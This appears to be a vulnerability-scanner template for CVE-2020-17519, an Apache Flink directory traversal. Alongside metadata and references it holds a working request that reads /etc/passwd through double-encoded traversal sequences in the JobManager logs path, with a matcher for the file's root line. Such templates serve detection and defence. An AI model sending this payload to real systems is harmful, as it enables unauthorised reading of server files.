2021-01-06 07:08:41 +00:00
id: CVE-2020-17519
info:
  name: Apache Flink directory traversal
  author: pdteam
  severity: high
  description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
  reference:
    - https://github.com/B1anda0/CVE-2020-17519
    - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d%40%3Cdev.flink.apache.org%3E
    - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cdev.flink.apache.org%3E
    - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cuser.flink.apache.org%3E
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-17519
    cwe-id: CWE-552
  tags: cve,cve2020,apache,lfi,flink
requests:
  - method: GET
    path:
      - "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body